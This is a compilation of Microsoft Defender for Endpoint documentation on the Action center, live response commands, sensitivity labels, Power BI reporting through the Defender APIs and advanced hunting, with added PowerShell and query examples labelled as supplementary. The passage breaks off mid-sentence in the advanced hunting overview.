Tech Community: Microsoft Defender for Endpoint Tech Community.


Visit the Action center to see remediation actions
Article • 02/21/2024

During and after an automated investigation, remediation actions for threat detections
are identified. Depending on the particular threat and how automated investigation and
remediation capabilities are configured for your organization, some remediation actions
are taken automatically, and others require approval. If you're part of your
organization's security operations team, you can view pending and completed
remediation actions in the Action center.

Applies to:

Microsoft Defender XDR


Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business

The unified Action center


Recently, the Action center was updated. You now have a unified Action center
experience. To access your Action center, go to https://security.microsoft.com/action-
center and sign in.

What's changed?
The following table compares the new, unified Action center to the previous Action
center.

The new, unified Action center | The previous Action center
Lists pending and completed actions for devices and email in one location (Microsoft Defender for Endpoint plus Microsoft Defender for Office 365) | Lists pending and completed actions for devices (Microsoft Defender for Endpoint only)
Is located at: https://security.microsoft.com/action-center | Is located at: https://securitycenter.windows.com/action-center
In the Microsoft Defender portal, choose Action center. | In the Microsoft Defender portal, choose Automated investigations > Action center.


The unified Action center brings together remediation actions across Defender for
Endpoint and Defender for Office 365. It defines a common language for all remediation
actions, and provides a unified investigation experience.

You can use the unified Action center if you have appropriate permissions and one or
more of the following subscriptions:

Microsoft Defender XDR


Defender for Endpoint
Defender for Office 365
Defender for Business

Using the Action center


To get to the unified Action center in the improved Microsoft Defender portal:

1. Go to the Microsoft Defender portal and sign in.

2. In the navigation pane, select Action center.

3. Use the Pending actions and History tabs. The following table summarizes what
you'll see on each tab:

Tab | Description
Pending | Displays a list of actions that require attention. You can approve or reject actions one at a time, or select multiple actions if they have the same type of action (such as Quarantine file). TIP: Review and approve (or reject) pending actions as soon as possible so that your automated investigations can complete in a timely manner.
History | Serves as an audit log for actions that were taken, such as: remediation actions taken as a result of automated investigations; remediation actions approved by your security operations team; commands run and remediation actions applied during live response sessions; remediation actions taken by threat protection features in Microsoft Defender Antivirus. Also provides a way to undo certain actions (see Undo completed actions).

4. To customize, sort, filter, and export data in the Action center, take one or more of the following steps:

Select a column heading to sort items in ascending or descending order.
Use the time period filter to view data for the past day, week, 30 days, or 6 months.
Choose the columns that you want to view.
Specify how many items to include on each page of data.
Use filters to view just the items you want to see.
Select Export to export results to a .csv file.

Next steps
View and approve remediation actions
See the interactive guide: Investigate and remediate threats with Microsoft
Defender for Endpoint

See also
Address false positives/negatives in Microsoft Defender for Endpoint


Investigate entities on devices using live
response
Article • 05/02/2023

Applies to:

Microsoft Defender for Endpoint Plan 2


Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Live response gives security operations teams instantaneous access to a device (also
referred to as a machine) using a remote shell connection. This gives you the power to
do in-depth investigative work and take immediate response actions to promptly
contain identified threats in real time.

Live response is designed to enhance investigations by enabling your security operations team to collect forensic data, run scripts, send suspicious entities for analysis, remediate threats, and proactively hunt for emerging threats.

With live response, analysts can do all of the following tasks:

Run basic and advanced commands to do investigative work on a device.
Download files such as malware samples and outcomes of PowerShell scripts.
Download files in the background.
Upload a PowerShell script or executable to the library and run it on a device from a tenant level.
Take or undo remediation actions.

Before you begin


Before you can initiate a session on a device, make sure you fulfill the following
requirements:

Verify that the device is running a supported operating system version. Devices must be running one of the following:

Windows 10 & 11
Version 1909 or later
Version 1903 with KB4515384
Version 1809 (RS 5) with KB4537818
Version 1803 (RS 4) with KB4537795
Version 1709 (RS 3) with KB4537816

macOS - Minimum required version: 101.43.84. Supported for Intel-based and ARM-based macOS devices.

Linux - Minimum required version: 101.45.13

Windows Server 2012 R2 - with KB5005292

Windows Server 2016 - with KB5005292

7 Note

For Windows Server 2012 R2 or 2016 you must have the unified agent installed, and it's recommended to update to the latest sensor version with KB5005292.

Windows Server 2019
Version 1903 or later (with KB4515384)
Version 1809 (with KB4537818)

Windows Server 2022

Enable live response from the Advanced features settings page.

7 Note

Only admins and users who have "Manage Portal Settings" permissions can enable live response.

Enable live response for servers from the Advanced features settings page (recommended). The same "Manage Portal Settings" permission is required.

Enable live response unsigned script execution (optional).

) Important

Signature verification only applies to PowerShell scripts.

2 Warning

Allowing the use of unsigned scripts may increase your exposure to threats.

Running unsigned scripts is not recommended because it increases your exposure to threats. If you must use them, enable the setting in the Advanced features settings page.

Ensure that you have the appropriate permissions.

Only users who have been provisioned with the appropriate permissions can
initiate a session. For more information on role assignments, see Create and
manage roles.

) Important

The option to upload a file to the library is only available to users with
"Manage Security Settings" permission. The button is greyed out for users
with only delegated permissions.

Depending on the role that's been granted to you, you can run basic or advanced live response commands. User permissions are controlled by RBAC custom roles.

Live response dashboard overview


When you initiate a live response session on a device, a dashboard opens. The dashboard provides information about the session such as the following:

Who created the session
When the session started
The duration of the session

The dashboard also gives you access to:

Disconnect session
Upload files to the library
Command console
Command log

Initiate a live response session on a device

7 Note

Live response actions initiated from the Device page are not available in the
machineactions API.

1. Sign in to Microsoft Defender portal.

2. Navigate to Endpoints > Device inventory and select a device to investigate. The
devices page opens.

3. Launch the live response session by selecting Initiate live response session. A
command console is displayed. Wait while the session connects to the device.

4. Use the built-in commands to do investigative work. For more information, see
Live response commands.

5. After completing your investigation, select Disconnect session, then select Confirm.

Live response commands


Depending on the role that's been granted to you, you can run basic or advanced live
response commands. User permissions are controlled by RBAC custom roles. For more
information on role assignments, see Create and manage roles.

7 Note

Live response is a cloud-based interactive shell; as such, the response time of a given command may vary with network quality and system load between the end user and the target device.
Basic commands
The following commands are available for user roles that are granted the ability to run
basic live response commands. For more information on role assignments, see Create
and manage roles.

Command | Description | Windows and Windows Server | macOS | Linux
cd | Changes the current directory. | Y | Y | Y
cls | Clears the console screen. | Y | Y | Y
connect | Initiates a live response session to the device. | Y | Y | Y
connections | Shows all the active connections. | Y | N | N
dir | Shows a list of files and subdirectories in a directory. | Y | Y | Y
drivers | Shows all drivers installed on the device. | Y | N | N
fg <command ID> | Places the specified job in the foreground, making it the current job. NOTE: fg takes a command ID available from jobs, not a PID. | Y | Y | Y
fileinfo | Gets information about a file. | Y | Y | Y
findfile | Locates files by a given name on the device. | Y | Y | Y
getfile <file_path> | Downloads a file. | Y | Y | Y
help | Provides help information for live response commands. | Y | Y | Y
jobs | Shows currently running jobs, their ID and status. | Y | Y | Y
persistence | Shows all known persistence methods on the device. | Y | N | N
processes | Shows all processes running on the device. | Y | Y | Y
registry | Shows registry values. | Y | N | N
scheduledtasks | Shows all scheduled tasks on the device. | Y | N | N
services | Shows all services on the device. | Y | N | N
startupfolders | Shows all known files in startup folders on the device. | Y | N | N
status | Shows the status and output of a specific command. | Y | Y | Y
trace | Sets the terminal's logging mode to debug. | Y | Y | Y

Advanced commands
The following commands are available for user roles that are granted the ability to run
advanced live response commands. For more information on role assignments, see
Create and manage roles.

Command | Description | Windows and Windows Server | macOS | Linux
analyze | Analyzes the entity with various incrimination engines to reach a verdict. | Y | N | N
collect | Collects a forensics package from the device. | N | Y | Y
isolate | Disconnects the device from the network while retaining connectivity to the Defender for Endpoint service. | N | Y | N
release | Releases a device from network isolation. | N | Y | N
run | Runs a PowerShell script from the library on the device. | Y | Y | Y
library | Lists files that were uploaded to the live response library. | Y | Y | Y
putfile | Puts a file from the library on the device. Files are saved in a working folder and are deleted when the device restarts by default. | Y | Y | Y
remediate | Remediates an entity on the device. The remediation action varies by entity type: File: delete; Process: stop, delete image file; Service: stop, delete image file; Registry entry: delete; Scheduled task: remove; Startup folder item: delete file. NOTE: This command has a prerequisite command. You can use the -auto flag with remediate to automatically run the prerequisite command. | Y | Y | Y
scan | Runs a quick antivirus scan to help identify and remediate malware. | N | Y | Y
undo | Restores an entity that was remediated. | Y | N | N

Use live response commands


The commands that you can use in the console follow similar principles as Windows
Commands.

The advanced commands offer a more powerful set of actions, such as putting a file on the device, running scripts on it, and taking remediation actions on an entity.

Get a file from the device

For scenarios when you'd like to get a file from a device you're investigating, you can use the getfile command. This allows you to save the file from the device for further investigation.

7 Note

The following file size limits apply:

getfile limit: 3 GB
fileinfo limit: 30 GB
library limit: 250 MB

Download a file in the background

To enable your security operations team to continue investigating an impacted device, files can be downloaded in the background.

To download a file in the background, in the live response command console, type getfile <file_path> & (the same getfile command used for foreground downloads, with & appended).
If you are waiting for a file to be downloaded, you can move it to the background by using Ctrl + Z.
To bring a file download to the foreground, in the live response command console, type fg <command_id>.

Here are some examples:

Command | What it does
getfile "C:\windows\some_file.exe" & | Starts downloading a file named some_file.exe in the background.
fg 1234 | Returns a download with command ID 1234 to the foreground.

Put a file in the library

Live response has a library into which you can put files. The library stores files (such as scripts) that can be run in a live response session at the tenant level.

Live response allows PowerShell scripts to run; however, you must first put the files into the library before you can run them.

You can have a collection of PowerShell scripts that can run on devices that you initiate live response sessions with.

To upload a file in the library

1. Click Upload file to library.
2. Click Browse and select the file.
3. Provide a brief description.
4. Specify whether you'd like to overwrite a file with the same name.
5. If you want to record which parameters the script needs, select the Script parameters check box. In the text field, enter an example and a description.
6. Click Confirm.
7. (Optional) To verify that the file was uploaded to the library, run the library command.

Cancel a command
Anytime during a session, you can cancel a command by pressing CTRL + C.

2 Warning

Using this shortcut does not stop the command on the agent side; it only cancels the command in the portal. State-changing operations such as remediate may therefore continue to run after the command is canceled.

Run a script
Before you can run a PowerShell/Bash script, you must first upload it to the library.

After uploading the script to the library, use the run command to run the script.

If you plan to use an unsigned PowerShell script in the session, you'll need to enable the
setting in the Advanced features settings page.

2 Warning

Allowing the use of unsigned scripts may increase your exposure to threats.

Apply command parameters

View the console help to learn about command parameters. To learn about an individual command, run:

Console
help <command name>

When applying parameters to commands, note that parameters are handled based on a fixed order:

Console
<command name> param1 param2

When specifying parameters outside of the fixed order, specify the name of the parameter with a hyphen before providing the value:

Console
<command name> -param2_name param2

When using commands that have prerequisite commands, you can use flags:

Console
<command name> -type file -id <file path> -auto

or

Console
remediate file <file path> -auto

Supported output types


Live response supports table and JSON format output types. For each command, there's
a default output behavior. You can modify the output in your preferred output format
using the following commands:

-output json

-output table

7 Note

Fewer fields are shown in table format due to the limited space. To see more details
in the output, you can use the JSON output command so that more details are
shown.

Supported output pipes


Live response supports output piping to CLI and file. CLI is the default output behavior.
You can pipe the output to a file using the following command: [command] >
[filename].txt.

Example:

Console

processes > output.txt

View the command log


Select the Command log tab to see the commands used on the device during a session.
Each command is tracked with full details such as:

ID
Command line
Duration
Status and input or output side bar

Limitations
At most 25 live response sessions can be active at a time.
The live response session inactive timeout is 30 minutes.
Individual live response commands have a time limit of 10 minutes, with the exception of getfile, findfile, and run, which have a limit of 30 minutes.
A user can initiate up to 10 concurrent sessions.
A device can only be in one session at a time.
The following file size limits apply:
getfile limit: 3 GB
fileinfo limit: 30 GB
library limit: 250 MB

Related article
Live response command examples


Live response command examples
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 2


Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Learn about common commands used in live response and see examples on how
they're typically used.

Depending on the role you have, you can run basic or advanced live response
commands. For more information on basic and advanced commands, see Investigate
entities on devices using live response.

analyze
Console
# Analyze the file malware.txt
analyze file c:\Users\user\Desktop\malware.txt

Console
# Analyze the process by PID
analyze process 1234

connections
Console
# List active connections in json format using parameter name
connections -output json

Console
# List active connections in json format without parameter name
connections json

dir
Console
# List files and sub-folders in the current folder (by default it will show relative paths [-relative_path])
dir

Console
# List files and sub-folders in the current folder, with their full path
dir -full_path

Console
# List files and sub-folders in a specific folder
dir C:\Users\user\Desktop\

Console
# List files and subfolders in the current folder in json format
dir -output json

fileinfo
Console
# Display information about a file
fileinfo C:\Windows\notepad.exe

findfile
Console
# Find file by name
findfile test.txt

getfile
Console
# Download a file from a machine
getfile c:\Users\user\Desktop\work.txt

Console
# Download a file from a machine, automatically run prerequisite commands
getfile c:\Users\user\Desktop\work.txt -auto

7 Note

The following file types cannot be downloaded using this command from within live response:

Reparse point files
Sparse files
Empty files
Virtual files, or files that are not fully present locally

These file types are supported by PowerShell. Use PowerShell as an alternative if you have problems using this command from within live response.

library
Console
# List files in the library
library

Console
# Delete a file from the library
library delete script.ps1

processes
Console
# Show all processes
processes

Console
# Get process by pid
processes 123

Console
# Get process by pid with argument name
processes -pid 123

Console
# Get process by name
processes -name notepad.exe

putfile
Console
# Upload file from library
putfile get-process-by-name.ps1

Console
# Upload file from library, overwrite file if it exists
putfile get-process-by-name.ps1 -overwrite

Console
# Upload file from library, keep it on the machine after a restart
putfile get-process-by-name.ps1 -keep

registry
Console
# Show information about the values in a registry key
registry HKEY_CURRENT_USER\Console

Console
# Show information about a specific registry value (the double backslash \\ indicates a registry value versus a key)
registry HKEY_CURRENT_USER\Console\\ScreenBufferSize

remediate
Console
# Remediate file in specific path
remediate file c:\Users\user\Desktop\malware.exe

Console
# Remediate process with specific PID
remediate process 7960

Console
# See list of all remediated entities
remediate list

run
Console
# Run PowerShell script from the library without arguments
run script.ps1

Console
# Run PowerShell script from the library with arguments
run get-process-by-name.ps1 -parameters "-processName Registry"

7 Note

For long-running commands such as run or getfile, you may want to append the & symbol to the command to perform that action in the background. This allows you to continue investigating the machine and return to the background command when it's done, using the fg basic command.

7 Note

When passing parameters to a live response script, do not include the following forbidden characters: ';', '&', '|', '!', and '$'.
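The following is an added example of a script shaped for the run invocation above. It is not the page's own get-process-by-name.ps1, whose contents the page does not show: only the parameter name -processName comes from the command line shown; the validation pattern, the parent-PID lookup and the output fields are this example's own choices. It assumes the script has been uploaded to the library and, if it is unsigned, that unsigned script execution has been enabled on the Advanced features page.

```powershell
# get-process-by-name.ps1 (added example; hypothetical contents for the script named above).
# Invoked from live response as:  run get-process-by-name.ps1 -parameters "-processName Registry"
[CmdletBinding()]
param(
    # Process name without the .exe suffix, as Get-Process -Name expects.
    # The pattern is stricter than the portal's forbidden-character list (; & | ! $):
    # anything that is not a plain image name is rejected before any lookup happens.
    [Parameter(Mandatory = $true)]
    [ValidatePattern('^[A-Za-z0-9._-]{1,64}$')]
    [string]$processName
)

$ErrorActionPreference = 'Stop'

try {
    $procs = @(Get-Process -Name $processName -ErrorAction Stop)
}
catch [Microsoft.PowerShell.Commands.ProcessCommandException] {
    # No such process: emit an empty JSON array so the command log shows a clean completion.
    Write-Output '[]'
    return
}

# Parent PIDs come from WMI, keyed by PID, so a protected process still yields a row
# (Get-Process exposes no parent and throws on some properties of protected processes).
$parents = @{}
Get-CimInstance -ClassName Win32_Process |
    ForEach-Object { $parents[[int]$_.ProcessId] = [int]$_.ParentProcessId }

$rows = foreach ($p in $procs) {
    [pscustomobject]@{
        Name      = $p.ProcessName
        Pid       = $p.Id
        ParentPid = $parents[[int]$p.Id]
        # Path and StartTime throw for protected or system processes; report null instead of failing.
        Path      = $(try { $p.Path } catch { $null })
        StartUtc  = $(try { $p.StartTime.ToUniversalTime().ToString('o') } catch { $null })
        SessionId = $p.SessionId
    }
}

# -InputObject keeps a single match as a one-element array, so consumers always get a JSON array.
ConvertTo-Json -InputObject @($rows) -Depth 3
```

The script returns JSON rather than formatted text so the output captured in the command log (or saved with the > redirection described earlier) can be parsed later without re-running the session.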

scheduledtasks
Console
# Get all scheduled tasks
scheduledtasks

Console
# Get specific scheduled task by location and name
scheduledtasks Microsoft\Windows\Subscription\LicenseAcquisition

Console
# Get specific scheduled task by location and name with spacing
scheduledtasks "Microsoft\Configuration Manager\Configuration Manager Health Evaluation"

undo
Console
# Restore remediated registry
undo registry HKEY_CURRENT_USER\Console\ScreenBufferSize

Console
# Restore remediated scheduledtask
undo scheduledtask Microsoft\Windows\Subscription\LicenseAcquisition

Console
# Restore remediated file
undo file c:\Users\user\Desktop\malware.exe


Microsoft Defender for Endpoint
sensitivity labels protect and prioritize
incident response
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

A typical advanced persistent threat (APT) lifecycle involves data exfiltration, the point at which data is taken from the organization. In those situations, sensitivity labels can tell security operations where to start by spelling out which data is the highest priority to protect.

Defender for Endpoint also uses sensitivity labels to make prioritization of security incidents simpler. For example, sensitivity labels quickly identify incidents that involve devices with sensitive information on them (such as confidential information).

Here's how to use sensitivity labels in Defender for Endpoint.

Investigate incidents that involve sensitive data on devices with Defender for Endpoint

Learn how to use data sensitivity labels to prioritize incident investigation.

7 Note

Labels are detected for Windows 10, version 1809 or later, and Windows 11.

1. In Microsoft Defender portal, select Incidents & alerts > Incidents.

2. Scroll over to see the Data sensitivity column. This column reflects sensitivity labels that are observed on devices related to the incidents, providing an indication of whether sensitive files are impacted by the incident.

You can also filter based on Data sensitivity.

3. Open the incident page to further investigate.

4. Select the Devices tab to identify devices storing files with sensitivity labels.

5. Select the devices that store sensitive data and search through the timeline to identify which files might be impacted, then take appropriate action to ensure that data is protected.

You can narrow down the events shown on the device timeline by searching for data sensitivity labels. Doing this shows only events associated with files that carry that label name.

 Tip

These data points are also exposed through the DeviceFileEvents table in advanced hunting, allowing queries and scheduled custom detections to take sensitivity labels and file protection status into account.

Related information about sensitivity labels
Learn about sensitivity labels in Office 365
Learn to apply sensitivity labels inside of email or Office
Learn how to use sensitivity labels as a condition when applying Data Loss Prevention


Create custom reports using Power BI
Article • 02/22/2024

Applies to:

Microsoft Defender for Endpoint Plan 2


Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

7 Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

 Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

In this section, you learn to create a Power BI report on top of Defender for Endpoint
APIs.

The first example demonstrates how to connect Power BI to Advanced Hunting API, and
the second example demonstrates a connection to our OData APIs, such as Machine
Actions or Alerts.

Connect Power BI to Advanced Hunting API


1. Open Microsoft Power BI.
2. Select Get Data > Blank Query.

3. Select Advanced Editor.

4. Copy the following and paste it in the editor:

Power Query M
let
    AdvancedHuntingQuery = "DeviceEvents | where ActionType contains 'Anti' | limit 20",

    HuntingUrl = "https://api.securitycenter.microsoft.com/api/advancedqueries",

    // GET .../api/advancedqueries?key=<query>; Power BI attaches the organizational account credentials.
    Response = Json.Document(Web.Contents(HuntingUrl, [Query=[key=AdvancedHuntingQuery]])),

    // Maps the type names the API returns in Schema to Power BI column types.
    TypeMap = #table(
        { "Type", "PowerBiType" },
        {
            { "Double", Double.Type },
            { "Int64", Int64.Type },
            { "Int32", Int32.Type },
            { "Int16", Int16.Type },
            { "UInt64", Number.Type },
            { "UInt32", Number.Type },
            { "UInt16", Number.Type },
            { "Byte", Byte.Type },
            { "Single", Single.Type },
            { "Decimal", Decimal.Type },
            { "TimeSpan", Duration.Type },
            { "DateTime", DateTimeZone.Type },
            { "String", Text.Type },
            { "Boolean", Logical.Type },
            { "SByte", Int8.Type },
            { "Guid", Text.Type }
        }),

    // Schema is a list of {Name, Type} records; join it to TypeMap to get a Power BI type per column.
    Schema = Table.FromRecords(Response[Schema]),
    TypedSchema = Table.Join(Table.SelectColumns(Schema, {"Name", "Type"}), {"Type"}, TypeMap, {"Type"}),
    Results = Response[Results],
    Rows = Table.FromRecords(Results, Schema[Name]),
    Table = Table.TransformColumnTypes(Rows, Table.ToList(TypedSchema, (c) => {c{0}, c{2}}))

in Table

5. Select Done.

6. Select Edit Credentials.

7. Select Organizational account > Sign in.

8. Enter your credentials and wait to be signed in.


9. Select Connect.

Now the results of your query appear as a table and you can start to build visualizations
on top of it!

You can duplicate this table, rename it, and edit the Advanced Hunting query inside to
get any data you would like.
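For use outside Power BI, here is an added example in PowerShell (not from the page, and not Microsoft's sample code) that issues the same advanced hunting request and applies the same schema-driven typing the M query above performs. The request function assumes you already hold an OAuth 2.0 access token for the Defender for Endpoint API in $Token; the response at the end is constructed, with made-up values, so the conversion step can be tried offline.

```powershell
# Added example, not code from the page or from Microsoft's Power BI samples.

function Invoke-MdeAdvancedHuntingQuery {
    param(
        [Parameter(Mandatory)] [string]$Token,   # assumed: bearer token for the Defender for Endpoint API
        [Parameter(Mandatory)] [string]$Query,
        [string]$ApiHost = 'api.securitycenter.microsoft.com'   # or a regional host from the tip above
    )
    # Same call shape as the Power Query above: GET .../api/advancedqueries?key=<query>
    $uri = "https://$ApiHost/api/advancedqueries?key=$([uri]::EscapeDataString($Query))"
    Invoke-RestMethod -Method Get -Uri $uri -Headers @{ Authorization = "Bearer $Token" }
}

function ConvertFrom-MdeHuntingResponse {
    # Turns the {Schema, Results} payload into objects whose properties carry .NET types,
    # mirroring the TypeMap / Table.TransformColumnTypes step in the M query.
    param([Parameter(Mandatory)] $Response)

    $convert = @{
        'DateTime' = { param($v) [datetimeoffset]::Parse($v, [cultureinfo]::InvariantCulture) }
        'Int64'    = { param($v) [int64]$v }
        'Int32'    = { param($v) [int32]$v }
        'Double'   = { param($v) [double]$v }
        'Boolean'  = { param($v) [System.Convert]::ToBoolean($v) }   # handles JSON bools and "true"/"false"
        'Guid'     = { param($v) [guid]$v }
        'String'   = { param($v) [string]$v }
    }

    foreach ($row in $Response.Results) {
        $typed = [ordered]@{}
        foreach ($col in $Response.Schema) {
            $raw = $row.($col.Name)
            $typed[$col.Name] = if ($null -eq $raw -or -not $convert.ContainsKey($col.Type)) {
                $raw                                   # keep nulls and unmapped types untouched
            } else {
                & $convert[$col.Type] $raw
            }
        }
        [pscustomobject]$typed
    }
}

# Constructed sample in the shape the API returns (Schema + Results); the values are made up.
$sample = @'
{
  "Schema": [
    { "Name": "Timestamp",           "Type": "DateTime" },
    { "Name": "DeviceName",          "Type": "String" },
    { "Name": "ActionType",          "Type": "String" },
    { "Name": "InitiatingProcessId", "Type": "Int64" }
  ],
  "Results": [
    { "Timestamp": "2024-02-20T10:15:00Z", "DeviceName": "ws01.contoso.example",
      "ActionType": "AntivirusDetection",     "InitiatingProcessId": 4120 },
    { "Timestamp": "2024-02-20T10:16:30Z", "DeviceName": "ws02.contoso.example",
      "ActionType": "AntivirusScanCompleted", "InitiatingProcessId": 2044 }
  ]
}
'@ | ConvertFrom-Json

$rows = ConvertFrom-MdeHuntingResponse -Response $sample
# Timestamp is now a DateTimeOffset, so comparisons and bucketing work without string parsing.
$rows | Where-Object { $_.Timestamp -gt [datetimeoffset]'2024-02-20T10:16:00Z' } | Format-Table

# Live use (needs a token):
# $live = Invoke-MdeAdvancedHuntingQuery -Token $Token -Query "DeviceEvents | where ActionType contains 'Anti' | limit 20"
# ConvertFrom-MdeHuntingResponse -Response $live
```

Typing the columns from Schema rather than guessing from the values matters for the same reason as in the Power BI query: a column that is empty in the first rows would otherwise come back as text, and date comparisons and numeric aggregates would silently misbehave.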

Connect Power BI to OData APIs


The only difference from the previous example is the query inside the editor. Follow
steps 1-3 above.

At step 4, instead of the code in that example, copy the following code and paste it in the editor to pull all Machine Actions from your organization:

Power Query M
let
    Query = "MachineActions",
    Source = OData.Feed("https://api.securitycenter.microsoft.com/api/" & Query, null, [Implementation="2.0", MoreColumns=true])
in
    Source

You can do the same for Alerts and Machines. You can also use OData queries as filters. See Using OData Queries.
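As an added example (not from the page), the same feed read from PowerShell with an OData $filter and manual paging: OData.Feed in Power BI follows @odata.nextLink for you, but a script has to do it itself. The field names used in the usage line (status, computerDnsName, requestor, creationDateTimeUtc) and the Pending status value are assumptions drawn from the Machine Actions API rather than anything this page states, and $Token is an access token you already hold.

```powershell
# Added example, not code from the page. Assumes $Token holds a Defender for Endpoint API bearer token.
function Get-MdeODataEntities {
    param(
        [Parameter(Mandatory)] [string]$Token,
        [Parameter(Mandatory)] [ValidateSet('MachineActions', 'Alerts', 'Machines')] [string]$Entity,
        [string]$Filter,                                        # OData $filter expression, optional
        [string]$ApiHost = 'api.securitycenter.microsoft.com'   # or a regional host from the tip above
    )
    $uri = "https://$ApiHost/api/$Entity"
    if ($Filter) { $uri += '?$filter=' + [uri]::EscapeDataString($Filter) }
    $headers = @{ Authorization = "Bearer $Token" }

    # Each page is {"value": [...], "@odata.nextLink": "..."}; keep going until no nextLink comes back.
    while ($uri) {
        $page = Invoke-RestMethod -Method Get -Uri $uri -Headers $headers
        $page.value
        $uri = $page.'@odata.nextLink'
    }
}

# Usage (needs a token): actions still awaiting approval, the programmatic counterpart of the
# Action center's Pending tab. Field and status names are assumed from the Machine Actions API.
# Get-MdeODataEntities -Token $Token -Entity MachineActions -Filter "status eq 'Pending'" |
#     Select-Object id, type, status, computerDnsName, requestor, creationDateTimeUtc |
#     Format-Table -AutoSize
```

Because the function emits each page's value array to the pipeline as it arrives, a large history can be streamed to Export-Csv or filtered further without first collecting everything in memory.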

Power BI dashboard samples in GitHub


For more information, see the Power BI report templates .
Sample reports
View the Microsoft Defender for Endpoint Power BI report samples. For more
information, see Browse code samples.

Related articles
Defender for Endpoint APIs
Advanced Hunting API
Using OData Queries


Threat protection report in Microsoft
Defender for Endpoint
Article • 02/16/2024

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

) Important

The Microsoft Defender for Endpoint Threat Protection report page is now
deprecated and is no longer available. Microsoft recommends that you transition to
either the Defender XDR alerts or advanced hunting to understand endpoint threat
protection details. See the following sections for more information.

Use the alert queue filter in Defender XDR


Due to the deprecation of the Defender for Endpoint Threat protection report, you can
use the Defender XDR alerts view, filtered against Defender for Endpoint, to see the
current status of alerts for protected devices. For alert status, such as unresolved, you
can filter against New and In progress items. Learn more about Defender XDR Alerts.

Use Advanced hunting queries


Due to the deprecation of the Defender for Endpoint Threat protection report, you can
use Advanced hunting queries to find Defender for Endpoint threat protection
information. Currently there's no alert status in Advanced hunting elements that maps
to resolve/unresolve. Learn more about Advanced hunting in Defender XDR. See the
following section for a sample advanced hunting query that shows endpoint related
threat protection details.

Alert status
Kusto
// Severity
AlertInfo
| where Timestamp > startofday(now()) // Today
| summarize count() by Severity
| render columnchart

// Detection source
AlertInfo
| where Timestamp > startofday(now()) // Today
| summarize count() by DetectionSource
| render columnchart

// Detection category
AlertInfo
| where Timestamp > startofday(now()) // Today
| summarize count() by Category
| render columnchart

Alert trend
Kusto
// Severity
AlertInfo
| where Timestamp > ago(30d)
| summarize count() by Severity, bin(Timestamp, 1d)
| render timechart

// Detection source
AlertInfo
| where Timestamp > ago(30d)
| summarize count() by DetectionSource, bin(Timestamp, 1d)
| render timechart

// Detection category
AlertInfo
| where Timestamp > ago(30d)
| summarize count() by Category, bin(Timestamp, 1d)
| render timechart

Related articles
Device health and compliance report


Monthly security summary report in
Microsoft Defender for Endpoint
Article • 06/12/2023

Applies to:

Microsoft Defender XDR


Microsoft Defender for Endpoint
Microsoft Defender for Business

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

The report gives organizations a visual summary of key findings and of the preventative actions completed in the last month to enhance the organization's overall security posture. It helps you identify areas of strength and improvement, track your progress over time, and prioritize your actions based on risk and impact.

To access this report, in the navigation pane, choose Reports > Endpoints > Monthly Security Summary. The monthly security summary report contains the following sections:

Microsoft Secure Score
Secure score compared to other organizations
Devices onboarded
Protection against threats
Web content monitoring and filtering
Suspicious or malicious activities

You can generate a PDF report of the summary by selecting Generate PDF report. The generated report is a summary of the last 30 days.

Microsoft Secure Score

Microsoft Secure Score is a measurement of an organization's security posture and how
well you have implemented security best practices and recommendations across the
devices in your organization. The secure score card shows how the overall cybersecurity
strength of an organization has improved in the past month and how it compares to
other companies with a similar number of managed devices.

Secure score compared to other organizations

This score is an evaluation of an organization's security score in relation to organizations
of a similar size. It's a way to benchmark an organization's performance in implementing
security measures compared to other organizations of an equivalent size.

Devices onboarded

The devices card provides information on the number of devices that were onboarded in
the last month as well as devices still not onboarded. Onboarding devices is essential
for enabling protection and detection capabilities.

Protection against threats

This card shows how effective your defenses are against common attack vectors such as
phishing and ransomware. A higher number indicates better defense in place against
phishing and ransomware. The report shows how many threats were blocked or
mitigated in the last month and how your protection level has increased.

Web content monitoring and filtering

Shows the number of malicious URLs that were blocked by Microsoft Defender for
Endpoint in the last month. The report also shows the categories of URLs that were
blocked and the number of clicks for each category.

Suspicious or malicious activities

Track how many incidents and alerts were resolved in the past month using the incidents
card. The card also shows all active incidents and alerts that require attention. You'll also
be able to see a list of the top 10 severe incidents, their status, number of alerts, and the
impacted devices and users.



Proactively hunt for threats with advanced hunting in Microsoft Defender XDR
Article • 11/15/2023

Note

Want to experience Microsoft Defender XDR? Learn more about how you can
evaluate and pilot Microsoft Defender XDR.

Applies to:

Microsoft Defender XDR

Advanced hunting is a query-based threat hunting tool that lets you explore up to 30
days of raw data. You can proactively inspect events in your network to locate threat
indicators and entities. The flexible access to data enables unconstrained hunting for
both known and potential threats.

Advanced hunting supports two modes, guided and advanced. Use guided mode if you
are not yet familiar with Kusto Query Language (KQL) or prefer the convenience of a
query builder. Use advanced mode if you are comfortable using KQL to create queries
from scratch.

To start hunting, read Choose between guided and advanced modes to hunt in
Microsoft Defender XDR.

You can use the same threat hunting queries to build custom detection rules. These
rules run automatically to check for and then respond to suspected breach activity,
misconfigured machines, and other findings.

Advanced hunting supports queries that check a broader data set coming from:

- Microsoft Defender for Endpoint
- Microsoft Defender for Office 365
- Microsoft Defender for Cloud Apps
- Microsoft Defender for Identity

To use advanced hunting, turn on Microsoft Defender XDR.

For more information on advanced hunting in Microsoft Defender for Cloud Apps data,
see the video.

Get access
To use advanced hunting or other Microsoft Defender XDR capabilities, you need an
appropriate role in Microsoft Entra ID. Read about required roles and permissions for
advanced hunting.

Also, your access to endpoint data is determined by role-based access control (RBAC)
settings in Microsoft Defender for Endpoint. Read about managing access to Microsoft
Defender XDR.

Data freshness and update frequency

Advanced hunting data can be categorized into two distinct types, each consolidated
differently.

- Event or activity data—populates tables about alerts, security events, system
events, and routine assessments. Advanced hunting receives this data almost
immediately after the sensors that collect them successfully transmit them to the
